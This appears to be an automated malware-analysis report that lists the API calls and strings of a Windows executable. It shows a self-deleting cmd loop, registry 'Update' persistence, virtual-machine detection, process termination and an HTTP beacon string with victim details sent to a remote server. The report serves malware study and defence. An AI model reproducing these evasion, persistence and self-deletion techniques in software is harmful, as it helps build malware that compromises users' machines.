      • Part of subcall function 00414010: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041401B
      • Part of subcall function 00414010: memset.NTDLL(?,00000000), ref: 0041403E
      • Part of subcall function 00414010: Process32FirstW.KERNEL32(?,?), ref: 00414056
      • Part of subcall function 00414010: lstrcmpiW.KERNEL32(?,0041B01C), ref: 0041407C
      • Part of subcall function 00414010: Process32NextW.KERNEL32(?,?), ref: 00414094
      • Part of subcall function 00414010: CloseHandle.KERNEL32 ref: 004140A0
      • Part of subcall function 004140C0: GetModuleHandleA.KERNEL32(0041B020), ref: 004140D7
    Strings
    • Program Manager, xrefs: 0040104400401088
    • Shell_TrayWnd, xrefs: 0040105800401096
    • QnY8EHt, xrefs:
    • /q /c for /l %%i in (1, 1, 4000000000) do if not exist "%s" (exit) else (del /f "%s"), xrefs:
    • ComSpec, xrefs:
    Function 004017E0, Relevance: 26.3, APIs: 4, Strings: 4, Instructions: 94
    APIs
    • GetModuleHandleW.KERNEL32(?), ref: 004018A5
    • GetProcAddress.KERNEL32(?,?), ref: 004018B1
    • VirtualAlloc.KERNEL32(00000000), ref: 004018DD
    • VirtualFree.KERNEL32(01010000,00000000,00008000), ref: 00401924
    Strings
    Function 004137D0, Relevance: 24.7, APIs: 11, Strings: 11, Instructions: 111
    APIs
    • _alloca_probe.NTDLL ref: 004137D5
    • _snprintf.NTDLL ref: 004137FC
    • RtlGetLastWin32Error.NTDLL ref: 00413808
    • CreateFileA.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00413829
    • RtlGetLastWin32Error.NTDLL ref: 00413836
    • memset.NTDLL(?,00000000), ref: 00413872
    • DeviceIoControl.KERNEL32(?,002D1400,?,0000000C,?,00002000,?,00000000), ref: 0041389B
    • RtlGetLastWin32Error.NTDLL ref: 004138A5
    • CloseHandle.KERNEL32 ref: 004138AE
      • Part of subcall function 00413680: tolower.NTDLL ref: 004136B2
      • Part of subcall function 00413680: isspace.NTDLL ref: 004136BD
      • Part of subcall function 00413680: isprint.NTDLL ref: 00413709
      • Part of subcall function 00413680: isprint.NTDLL ref: 00413733
      • Part of subcall function 00413680: isspace.NTDLL ref: 00413785
    • CloseHandle.KERNEL32 ref: 004138F1
    • CloseHandle.KERNEL32 ref: 00413917
    Strings
    Function 004109D0, Relevance: 24.3, APIs: 8, Strings: 8, Instructions: 124
    APIs
    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 004109FE
    • RegQueryValueExA.ADVAPI32(?,?,?,?,?,?), ref: 00410A36
    • lstrlen.KERNEL32(DtbkysreQKna4DY9nAS2Fzn9sRFFyTQYFsTBGH92T), ref: 00410A4B
    • RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000000,?,?), ref: 00410A9C
    • lstrlen.KERNEL32(DtbkysreQKna4DY9nAS2Fzn9sRFFyTQYFsTBGH92T), ref: 00410AAB
    • RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000000,?,?), ref: 00410AFC
    • lstrlen.KERNEL32(DtbkysreQKna4DY9nAS2Fzn9sRFFyTQYFsTBGH92T), ref: 00410B0D
    • RegCloseKey.ADVAPI32(?), ref: 00410B3C
    Strings
    Function 004010C0, Relevance: 20.9, APIs: 7, Strings: 7, Instructions: 57
    APIs
    • GetModuleHandleW.KERNEL32(00000000), ref: 004010D0
    • strncpy.NTDLL(?,?), ref: 00401106
    • lstrlen.KERNEL32(?), ref: 00401116
    • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 00401125
    • _snprintf.NTDLL ref: 00401145
    • GetEnvironmentVariableA.KERNEL32(ComSpec,?,00000104), ref: 0040115C
    • ShellExecuteA.SHELL32(00000000,00000000,?,?,00000000,00000000), ref: 00401177
    Strings
    • QnY8EHt, xrefs: 004010DB
    • /q /c for /l %%i in (1, 1, 4000000000) do if not exist "%s" (exit) else (del /f "%s"), xrefs: 00401133
    • ComSpec, xrefs: 00401157
    Function 00412450, Relevance: 17.6, APIs: 9, Strings: 9, Instructions: 80
    APIs
    • LocalFree.KERNEL32 ref: 00412473
    • LocalFree.KERNEL32 ref: 00412478
    • GetTempPathW.KERNEL32(00000104,?), ref: 00412494
    • GetTempFileNameW.KERNEL32(?,tmp,?,?), ref: 004124B5
    • lstrcatW.KERNEL32(?,?), ref: 004124CC
    • CreateFileW.KERNEL32(?,10000000,00000000,00000000,00000002,00000080,00000000), ref: 004124E9
    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00412507
    • CloseHandle.KERNEL32 ref: 0041250E
      • Part of subcall function 00412B70: LocalFree.KERNEL32 ref: 00412B8D
      • Part of subcall function 00412B70: LocalFree.KERNEL32 ref: 00412B92
    • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 00412526
    Strings
    Function 00413D20, Relevance: 16.2, APIs: 5, Strings: 5, Instructions: 50
    APIs
    • RegCreateKeyExA.ADVAPI32 ref: 00413D54
    • RegQueryValueExA.ADVAPI32(?,VideoBiosVersion,00000000,?,?,?), ref: 00413D92
    • RegCloseKey.ADVAPI32 ref: 00413D9C
    • CharUpperBuffA.USER32(?,?), ref: 00413DAC
    • strstr.NTDLL(?), ref: 00413DBC
    Strings
    Function 00413AA0, Relevance: 15.1, APIs: 10, Instructions: 78
    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413AAB
    • memset.NTDLL(?,00000000), ref: 00413AC8
    • Process32FirstW.KERNEL32(?,?), ref: 00413ADE
    • lstrcmpiW.KERNEL32(?), ref: 00413B0C
    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00413B1B
    • TerminateProcess.KERNEL32(?,000000FF), ref: 00413B26
    • CloseHandle.KERNEL32 ref: 00413B2D
    • lstrcmpiW.KERNEL32(?), ref: 00413B42
    • Process32NextW.KERNEL32(?,?), ref: 00413B5B
      • Part of subcall function 004139F0: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00413A18
      • Part of subcall function 004139F0: Thread32First.KERNEL32 ref: 00413A3F
      • Part of subcall function 004139F0: OpenThread.KERNEL32(00000002,00000000,?), ref: 00413A73
      • Part of subcall function 004139F0: SuspendThread.KERNEL32 ref: 00413A78
      • Part of subcall function 004139F0: CloseHandle.KERNEL32 ref: 00413A7B
      • Part of subcall function 004139F0: Thread32Next.KERNEL32(?,?), ref: 00413A87
      • Part of subcall function 004139F0: CloseHandle.KERNEL32 ref: 00413A95
    • CloseHandle.KERNEL32 ref: 00413B67
    Function 00414720, Relevance: 14.0, APIs: 6, Strings: 6, Instructions: 42
    APIs
    • memset.NTDLL(C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\5d5Edbi7R.bmp,00000000), ref: 00414732
    • GetTempPathW.KERNEL32(00000104), ref: 00414743
    • RtlGetLastWin32Error.NTDLL ref: 0041474D
    • _snwprintf.NTDLL(C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\5d5Edbi7R.bmp,00000207,%s%S.bmp,?,?), ref: 00414776
    • CreateFileW.KERNEL32(C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\5d5Edbi7R.bmp,10000000,00000000,00000000,00000003,00000080,00000000), ref: 00414795
    • CloseHandle.KERNEL32 ref: 004147AD
      • Part of subcall function 00414200: CoCreateInstance.OLE32(00419288,00000000,00000001,0041988C,p~7), ref: 00414221
      • Part of subcall function 00414200: CoCreateInstance.OLE32(00419278,00000000,00000001,004192E8,0041BA90), ref: 00414242
      • Part of subcall function 00414200: CoCreateInstance.OLE32(00419298,00000000,00000001,0041993C,0041BA7C), ref: 00414284
      • Part of subcall function 00414200: CoCreateInstance.OLE32(0041986C,00000000,00000001,0041989C,0041BA98), ref: 00414381
      • Part of subcall function 00414200: memset.NTDLL(?,00000000), ref: 004143D7
      • Part of subcall function 00414200: CoCreateInstance.OLE32(0041987C,00000000,00000001,0041989C,0041BAA0), ref: 00414484
      • Part of subcall function 00414200: GetProcessHeap.KERNEL32 ref: 0041457E
      • Part of subcall function 00414200: RtlAllocateHeap.NTDLL ref: 00414585
      • Part of subcall function 00414200: RtlGetLastWin32Error.NTDLL ref: 00414594
      • Part of subcall function 00414200: CreateFileW.KERNEL32(C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\5d5Edbi7R.bmp,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00414659
      • Part of subcall function 00414200: RtlGetLastWin32Error.NTDLL ref: 00414666
      • Part of subcall function 00414200: WriteFile.KERNEL32(?,?,0000000E,?,00000000), ref: 004146A3
      • Part of subcall function 00414200: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004146B2
      • Part of subcall function 00414200: WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 004146C8
      • Part of subcall function 00414200: CloseHandle.KERNEL32 ref: 004146CB
      • Part of subcall function 00414200: CoTaskMemFree.OLE32(?), ref: 004146DC
    Strings
    Function 004139F0, Relevance: 12.5, APIs: 7, Instructions: 67
    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00413A18
    • Thread32First.KERNEL32 ref: 00413A3F
    • OpenThread.KERNEL32(00000002,00000000,?), ref: 00413A73
    • SuspendThread.KERNEL32 ref: 00413A78
    • CloseHandle.KERNEL32 ref: 00413A7B
    • Thread32Next.KERNEL32(?,?), ref: 00413A87
    • CloseHandle.KERNEL32 ref: 00413A95
    Function 00418430, Relevance: 12.5, APIs: 7, Instructions: 67
    APIs
    • GetWindow.USER32(00000008,00000004), ref: 00418448
    • EnableWindow.USER32(?,00000000), ref: 00418458
    • GetMessageW.USER32(00000008,00000005), ref: 0041846F
    • KiUserApcDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 0041848B
    • TranslateMessage.USER32(?), ref: 004184AD
    • DispatchMessageW.USER32(?), ref: 004184B8
    • EnableWindow.USER32(?,00000001), ref: 004184C7
    Function 00414010, Relevance: 11.6, APIs: 6, Instructions: 59
    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041401B
    • memset.NTDLL(?,00000000), ref: 0041403E
    • Process32FirstW.KERNEL32(?,?), ref: 00414056
    • lstrcmpiW.KERNEL32(?,0041B01C), ref: 0041407C
    • Process32NextW.KERNEL32(?,?), ref: 00414094
    • CloseHandle.KERNEL32 ref: 004140A0
    Function 004184E0, Relevance: 10.6, APIs: 5, Strings: 5, Instructions: 112
    APIs
    Strings
    Function 00401190, Relevance: 10.2, APIs: 4, Strings: 4, Instructions: 50
    APIs
    • RegCreateKeyExA.ADVAPI32(00419494,?,00000000,00000000,00000000,00000002,00000000,?,?), ref: 004011CF
    • lstrlen.KERNEL32(?), ref: 004011DC
    • RegSetValueExA.ADVAPI32(?,Update,?,00000001,?), ref: 004011F1
    • RegCloseKey.ADVAPI32(?), ref: 004011FA
    Strings
    Function 004183A0, Relevance: 8.2, APIs: 3, Strings: 3, Instructions: 43
    APIs
    • DestroyWindow.USER32(00000008), ref: 004183BD
    • CreateWindowExW.USER32 ref: 00418406
    • RtlGetLastWin32Error.NTDLL ref: 00418418
    Strings
    • 59FFB769-5787-4181-A4F0-949BF67A7793, xrefs: 004183F0
    Function 00418310, Relevance: 8.2, APIs: 3, Strings: 3, Instructions: 32
    APIs
    Strings
    • 59FFB769-5787-4181-A4F0-949BF67A7793, xrefs: 00418377
    Function 00401940, Relevance: 7.8, APIs: 5, Instructions: 109
    APIs
    • VirtualAlloc.KERNEL32(00000000,0000EB59,00001000,00000004), ref: 00401970
      • Part of subcall function 004017E0: GetModuleHandleW.KERNEL32(?), ref: 004018A5
      • Part of subcall function 004017E0: GetProcAddress.KERNEL32(?,?), ref: 004018B1
      • Part of subcall function 004017E0: VirtualAlloc.KERNEL32(00000000), ref: 004018DD
      • Part of subcall function 004017E0: VirtualFree.KERNEL32(01010000,00000000,00008000), ref: 00401924
    • VirtualAlloc.KERNEL32(00000000,01010008,00001000,00000004), ref: 004019E4
    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00401A18
    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00401A48
    • VirtualFree.KERNEL32(01010000,00000000,00008000), ref: 00401A52
    Function 00410660, Relevance: 7.2, APIs: 4, Instructions: 59
    APIs
    • RegCreateKeyExA.ADVAPI32(80000002,?,00000000,00000000), ref: 004106A1
    • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00020006,00000000,?,?), ref: 004106CE
    • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004), ref: 004106F0
    • RegCloseKey.ADVAPI32(?), ref: 004106FD
    Function 00410710, Relevance: 7.2, APIs: 4, Instructions: 52
    APIs
    • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019), ref: 00410746
    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00410768
    • RegQueryValueExA.ADVAPI32(00020019,?,00000000,00000000,?,?), ref: 00410795
    • RegCloseKey.ADVAPI32(?), ref: 004107A4
    Function 00414120, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 87
    APIs
    Strings
    Function 00416050, Relevance: 5.1, APIs: 4, Instructions: 84
    APIs
    • LocalFree.KERNEL32 ref: 00416073
    • LocalFree.KERNEL32 ref: 00416078
    • LocalFree.KERNEL32 ref: 004160EE
    • LocalFree.KERNEL32 ref: 004160F3
      • Part of subcall function 00412BF0: LocalAlloc.KERNEL32(00000040), ref: 00412C29
      • Part of subcall function 00412BF0: LocalFree.KERNEL32 ref: 00412C46
      • Part of subcall function 00412BF0: LocalFree.KERNEL32 ref: 00412C4B
      • Part of subcall function 00412BF0: LocalAlloc.KERNEL32(00000040,00000008), ref: 00412C5F
    Function 004159A0, Relevance: 4.7, APIs: 3, Instructions: 183
    APIs
    • CoCreateInstance.OLE32(004192F8,00000000,00000001,0041A124,?), ref: 004159CF
    • GetClientRect.USER32(?,?), ref: 00415AAA
      • Part of subcall function 004175D0: LocalAlloc.KERNEL32(00000040,00000058), ref: 004175E3
      • Part of subcall function 004175D0: LocalAlloc.KERNEL32(00000040,00000048), ref: 0041762F
    • DestroyWindow.USER32 ref: 00415B68
    Function 00413930, Relevance: 3.9, APIs: 2, Instructions: 61
    APIs
    • memset.NTDLL(?,00000000), ref: 00413942
    • GetCurrentHwProfileW.ADVAPI32 ref: 0041394E
      • Part of subcall function 004137D0: _alloca_probe.NTDLL ref: 004137D5
      • Part of subcall function 004137D0: _snprintf.NTDLL ref: 004137FC
      • Part of subcall function 004137D0: RtlGetLastWin32Error.NTDLL ref: 00413808
      • Part of subcall function 004137D0: CreateFileA.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00413829
      • Part of subcall function 004137D0: RtlGetLastWin32Error.NTDLL ref: 00413836
      • Part of subcall function 004137D0: memset.NTDLL(?,00000000), ref: 00413872
      • Part of subcall function 004137D0: DeviceIoControl.KERNEL32(?,002D1400,?,0000000C,?,00002000,?,00000000), ref: 0041389B
      • Part of subcall function 004137D0: RtlGetLastWin32Error.NTDLL ref: 004138A5
      • Part of subcall function 004137D0: CloseHandle.KERNEL32 ref: 004138AE
      • Part of subcall function 004137D0: CloseHandle.KERNEL32 ref: 004138F1
      • Part of subcall function 004137D0: CloseHandle.KERNEL32 ref: 00413917
    Function 00415D00, Relevance: 3.1, APIs: 2, Instructions: 132
    APIs
    Non-executed Functions
    Function 00413B90, Relevance: 6.2, APIs: 3, Instructions: 42
    APIs
    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00413BC8
    • DuplicateToken.ADVAPI32(00000000,?,?), ref: 00413BE1
    • FreeSid.ADVAPI32(?,?,?,?,004013E3), ref: 00413BF4
    Function 004107C0, Relevance: 6.2, APIs: 3, Instructions: 34
    APIs
      • Part of subcall function 00410710: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019), ref: 00410746
      • Part of subcall function 00410710: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00410768
      • Part of subcall function 00410710: RegQueryValueExA.ADVAPI32(00020019,?,00000000,00000000,?,?), ref: 00410795
      • Part of subcall function 00410710: RegCloseKey.ADVAPI32(?), ref: 004107A4
    • GetSystemTime.KERNEL32(?), ref: 004107D0
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 004107E0
    • RtlTimeToSecondsSince1970.NTDLL ref: 004107F8
      • Part of subcall function 00410660: RegCreateKeyExA.ADVAPI32(80000002,?,00000000,00000000), ref: 004106A1
      • Part of subcall function 00410660: RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00020006,00000000,?,?), ref: 004106CE
      • Part of subcall function 00410660: RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004), ref: 004106F0
      • Part of subcall function 00410660: RegCloseKey.ADVAPI32(?), ref: 004106FD
    Function 004125A0, Relevance: 2.2, APIs: 1, Instructions: 68
    APIs
    Function 004111D0, Relevance: 66.6, APIs: 30, Strings: 30, Instructions: 400
    APIs
    Strings
    Function 00413DD0, Relevance: 63.4, APIs: 20, Strings: 20, Instructions: 170
    APIs
      • Part of subcall function 00413D20: RegCreateKeyExA.ADVAPI32 ref: 00413D54
      • Part of subcall function 00413D20: RegQueryValueExA.ADVAPI32(?,VideoBiosVersion,00000000,?,?,?), ref: 00413D92
      • Part of subcall function 00413D20: RegCloseKey.ADVAPI32 ref: 00413D9C
      • Part of subcall function 00413D20: CharUpperBuffA.USER32(?,?), ref: 00413DAC
      • Part of subcall function 00413D20: strstr.NTDLL(?), ref: 00413DBC
      • Part of subcall function 004137D0: _alloca_probe.NTDLL ref: 004137D5
      • Part of subcall function 004137D0: _snprintf.NTDLL ref: 004137FC
      • Part of subcall function 004137D0: RtlGetLastWin32Error.NTDLL ref: 00413808
      • Part of subcall function 004137D0: CreateFileA.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00413829
      • Part of subcall function 004137D0: RtlGetLastWin32Error.NTDLL ref: 00413836
      • Part of subcall function 004137D0: memset.NTDLL(?,00000000), ref: 00413872
      • Part of subcall function 004137D0: DeviceIoControl.KERNEL32(?,002D1400,?,0000000C,?,00002000,?,00000000), ref: 0041389B
      • Part of subcall function 004137D0: RtlGetLastWin32Error.NTDLL ref: 004138A5
      • Part of subcall function 004137D0: CloseHandle.KERNEL32 ref: 004138AE
      • Part of subcall function 004137D0: CloseHandle.KERNEL32 ref: 004138F1
      • Part of subcall function 004137D0: CloseHandle.KERNEL32 ref: 00413917
    • lstrlen.KERNEL32(?), ref: 00413E37
    • CharUpperBuffA.USER32(?), ref: 00413E3F
    • lstrlen.KERNEL32(?), ref: 00413E49
    • CharUpperBuffA.USER32(?), ref: 00413E54
    • strstr.NTDLL(?), ref: 00413E60
    • strstr.NTDLL(?), ref: 00413E7A
    • strstr.NTDLL(?), ref: 00413E94
    • strstr.NTDLL(?), ref: 00413EAE
    • strstr.NTDLL(?), ref: 00413EC8
    • strstr.NTDLL(?), ref: 00413EE2
    • strstr.NTDLL(?), ref: 00413EFF
    • strstr.NTDLL(?), ref: 00413F1C
    • GetModuleHandleW.KERNEL32(00000000), ref: 00413F4C
    • strncpy.NTDLL(?,?), ref: 00413F85
    • lstrlen.KERNEL32(?), ref: 00413F95
    • lstrlen.KERNEL32(?), ref: 00413FA3
    • CharUpperBuffA.USER32(?), ref: 00413FAE
    • strstr.NTDLL(?), ref: 00413FBD
    • strstr.NTDLL(?), ref: 00413FD6
    • strstr.NTDLL(?), ref: 00413FEF
    Strings
    Function 00412660, Relevance: 24.5, APIs: 11, Strings: 11, Instructions: 111
    APIs
    • GetProcessHeap.KERNEL32 ref: 00412677
    • RtlAllocateHeap.NTDLL(?,?,7E418F9C), ref: 0041267A
    • memset.NTDLL(?,00000000), ref: 0041268E
      • Part of subcall function 00413DD0: lstrlen.KERNEL32(?), ref: 00413E37
      • Part of subcall function 00413DD0: CharUpperBuffA.USER32(?), ref: 00413E3F
      • Part of subcall function 00413DD0: lstrlen.KERNEL32(?), ref: 00413E49
      • Part of subcall function 00413DD0: CharUpperBuffA.USER32(?), ref: 00413E54
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413E60
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413E7A
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413E94
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413EAE
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413EC8
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413EE2
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413EFF
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413F1C
      • Part of subcall function 00413DD0: GetModuleHandleW.KERNEL32(00000000), ref: 00413F4C
      • Part of subcall function 00413DD0: strncpy.NTDLL(?,?), ref: 00413F85
      • Part of subcall function 00413DD0: lstrlen.KERNEL32(?), ref: 00413F95
      • Part of subcall function 00413DD0: lstrlen.KERNEL32(?), ref: 00413FA3
      • Part of subcall function 00413DD0: CharUpperBuffA.USER32(?), ref: 00413FAE
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413FBD
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413FD6
      • Part of subcall function 00413DD0: strstr.NTDLL(?), ref: 00413FEF
    • ExitProcess.KERNEL32(00001B8B), ref: 004126B6
      • Part of subcall function 00410E10: _vsnprintf.NTDLL(ver=0.0.0.3&subid=6369&os=2600&idx=2206633207&langid=1033&width=800&height=600&ip=178.18.17.204&loc=Anonymous Proxy&isp=FiberMax Networks BV,000003FF,?,?,?,7E418F9C,00412995,?,00000000,00000000,00000000,00000003,000018E1,?,83868CF7), ref: 00410E3A
    • GetProcessHeap.KERNEL32 ref: 004126E9
    • RtlFreeHeap.NTDLL ref: 004126EC
    • lstrlen.KERNEL32 ref: 00412715
      • Part of subcall function 004150B0: GetTickCount.KERNEL32 ref: 004150D0
      • Part of subcall function 004150B0: LocalAlloc.KERNEL32(00000000), ref: 004150F5
      • Part of subcall function 004150B0: RtlGetLastWin32Error.NTDLL ref: 004150FF
      • Part of subcall function 004150B0: memcpy.NTDLL(?,?,?,?,?,7C80AC61,?,7C80BE56), ref: 00415113
      • Part of subcall function 004150B0: _snprintf.NTDLL ref: 00415155
      • Part of subcall function 004150B0: LocalAlloc.KERNEL32(00000000), ref: 00415185
      • Part of subcall function 004150B0: memset.NTDLL(?,00000000), ref: 0041519B
      • Part of subcall function 004150B0: LocalAlloc.KERNEL32(00000000,00008000), ref: 004151B2
      • Part of subcall function 004150B0: memset.NTDLL(?,00000000), ref: 004151CA
      • Part of subcall function 004150B0: LocalAlloc.KERNEL32(00000000), ref: 004151DE
      • Part of subcall function 004150B0: memset.NTDLL(?,00000000), ref: 004151F0
      • Part of subcall function 004150B0: socket.WS2_32(00000002,00000001,00000006), ref: 00415254
      • Part of subcall function 004150B0: htons.WS2_32(00000050), ref: 0041528B
      • Part of subcall function 004150B0: gethostbyname.WS2_32(?), ref: 0041529E
      • Part of subcall function 004150B0: memcpy.NTDLL(?), ref: 004152B8
      • Part of subcall function 004150B0: connect.WS2_32(?,?,00000010), ref: 004152C8
      • Part of subcall function 004150B0: inet_addr.WS2_32(?), ref: 004152DC
      • Part of subcall function 004150B0: _snprintf.NTDLL ref: 00415310
      • Part of subcall function 004150B0: _snprintf.NTDLL ref: 0041532D
      • Part of subcall function 004150B0: _snprintf.NTDLL ref: 00415379
      • Part of subcall function 004150B0: send.WS2_32(?,?,?,00000000), ref: 0041544E
      • Part of subcall function 004150B0: memset.NTDLL(?,00000000), ref: 00415464
      • Part of subcall function 004150B0: recv.WS2_32(?,?,00008000,00000000), ref: 00415480
      • Part of subcall function 004150B0: recv.WS2_32(?,?,00008000,00000000), ref: 00415499
      • Part of subcall function 004150B0: strstr.NTDLL ref: 004154DA
      • Part of subcall function 004150B0: LocalFree.KERNEL32(?), ref: 00415564
      • Part of subcall function 004150B0: LocalFree.KERNEL32 ref: 0041556F
      • Part of subcall function 004150B0: LocalFree.KERNEL32(?), ref: 0041557E
      • Part of subcall function 004150B0: closesocket.WS2_32 ref: 0041558E
      • Part of subcall function 004150B0: LocalFree.KERNEL32(?), ref: 00415599
    • lstrlen.KERNEL32 ref: 00412737
    • lstrlen.KERNEL32 ref: 00412759
    • GetProcessHeap.KERNEL32 ref: 0041276A
    • RtlFreeHeap.NTDLL ref: 00412771
      • Part of subcall function 00414010: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041401B
      • Part of subcall function 00414010: memset.NTDLL(?,00000000), ref: 0041403E
      • Part of subcall function 00414010: Process32FirstW.KERNEL32(?,?), ref: 00414056
      • Part of subcall function 00414010: lstrcmpiW.KERNEL32(?,0041B01C), ref: 0041407C
      • Part of subcall function 00414010: Process32NextW.KERNEL32(?,?), ref: 00414094
      • Part of subcall function 00414010: CloseHandle.KERNEL32 ref: 004140A0
      • Part of subcall function 004140C0: GetModuleHandleA.KERNEL32(0041B020), ref: 004140D7
    Strings
    • ver=0.0.0.3&subid=6369&os=2600&idx=2206633207&langid=1033&width=800&height=600&ip=178.18.17.204&loc=Anonymous Proxy&isp=FiberMax Networks BV, xrefs: 0041266F004126CF
    Function 00401320, Relevance: 22.3, APIs: 10, Strings: 10, Instructions: 81
    APIs
    • GetModuleHandleW.KERNEL32(00000000), ref: 00401337
    • strncpy.NTDLL(?,?), ref: 00401364
    • lstrlen.KERNEL32(?), ref: 00401371
    • strrchr.NTDLL(?,0000005C), ref: 00401381
    • GetVersionExW.KERNEL32(?), ref: 004013A2
    • SHGetFolderPathA.SHELL32(00000000,0000801A,00000000,00000000,?), ref: 004013C6
    • RtlGetLastWin32Error.NTDLL ref: 004013D0
    • lstrcat.KERNEL32(?,?), ref: 00401403
      • Part of subcall function 00413B90: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00413BC8
      • Part of subcall function 00413B90: DuplicateToken.ADVAPI32(00000000,?,?), ref: 00413BE1
      • Part of subcall function 00413B90: FreeSid.ADVAPI32(?,?,?,?,004013E3), ref: 00413BF4
    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004013ED
    • lstrcat.KERNEL32(?,00419500), ref: 004013FF
    Strings
    Function 004157E0, Relevance: 19.4, APIs: 9, Strings: 9, Instructions: 163
    APIs
    Strings
    Function 00410BB0, Relevance: 16.4, APIs: 3, Strings: 3, Instructions: 171
    APIs
      • Part of subcall function 004109D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 004109FE
      • Part of subcall function 004109D0: RegQueryValueExA.ADVAPI32(?,?,?,?,?,?), ref: 00410A36
      • Part of subcall function 004109D0: lstrlen.KERNEL32(DtbkysreQKna4DY9nAS2Fzn9sRFFyTQYFsTBGH92T), ref: 00410A4B
      • Part of subcall function 004109D0: RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000000,?,?), ref: 00410A9C
      • Part of subcall function 004109D0: lstrlen.KERNEL32(DtbkysreQKna4DY9nAS2Fzn9sRFFyTQYFsTBGH92T), ref: 00410AAB
      • Part of subcall function 004109D0: RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000000,?,?), ref: 00410AFC
      • Part of subcall function 004109D0: lstrlen.KERNEL32(DtbkysreQKna4DY9nAS2Fzn9sRFFyTQYFsTBGH92T), ref: 00410B0D
      • Part of subcall function 004109D0: RegCloseKey.ADVAPI32(?), ref: 00410B3C
      • Part of subcall function 00413500: GetProcessHeap.KERNEL32 ref: 00413528
      • Part of subcall function 00413500: RtlAllocateHeap.NTDLL(?,?,7C90FE21), ref: 0041352B
      • Part of subcall function 00413500: InternetOpenA.WININET(Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0),00000001,00000000,00000000,00000000), ref: 0041354D
      • Part of subcall function 00413500: InternetOpenUrlA.WININET(?,?,00000000,00000000,04080000,00000000), ref: 0041356C
      • Part of subcall function 00413500: RtlGetLastWin32Error.NTDLL ref: 0041357A
      • Part of subcall function 00413500: GetProcessHeap.KERNEL32 ref: 00413583
      • Part of subcall function 00413500: RtlFreeHeap.NTDLL ref: 00413586
      • Part of subcall function 00413500: GetProcessHeap.KERNEL32 ref: 004135A5
      • Part of subcall function 00413500: RtlAllocateHeap.NTDLL(?,?,?), ref: 004135A8
      • Part of subcall function 00413500: InternetReadFile.WININET(00000000,?,00010000,?), ref: 004135CD
      • Part of subcall function 00413500: GetProcessHeap.KERNEL32 ref: 004135F3
      • Part of subcall function 00413500: RtlReAllocateHeap.NTDLL(?,?,00040000), ref: 004135F6
      • Part of subcall function 00413500: memcpy.NTDLL(?,?,?,?,00010000,?,?,?,?), ref: 00413613
      • Part of subcall function 00413500: InternetReadFile.WININET(?,?,00010000,?), ref: 0041363F
      • Part of subcall function 00413500: InternetCloseHandle.WININET(00000000), ref: 00413654
      • Part of subcall function 00413500: InternetCloseHandle.WININET(?), ref: 00413663
      • Part of subcall function 00413500: GetProcessHeap.KERNEL32 ref: 0041366C
      • Part of subcall function 00413500: RtlFreeHeap.NTDLL ref: 0041366F
      • Part of subcall function 00410B50: strstr.NTDLL ref: 00410B77
      • Part of subcall function 00410B50: memcpy.NTDLL(00000507,?,?,?,?,0000001C,?,178.18.17.204,?), ref: 00410B8A
    • strncmp.NTDLL(Anonymous Proxy, , ), ref: 00410CF3
      • Part of subcall function 00410830: RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000), ref: 00410871
      • Part of subcall function 00410830: lstrlen.KERNEL32(178.18.17.204), ref: 0041088A
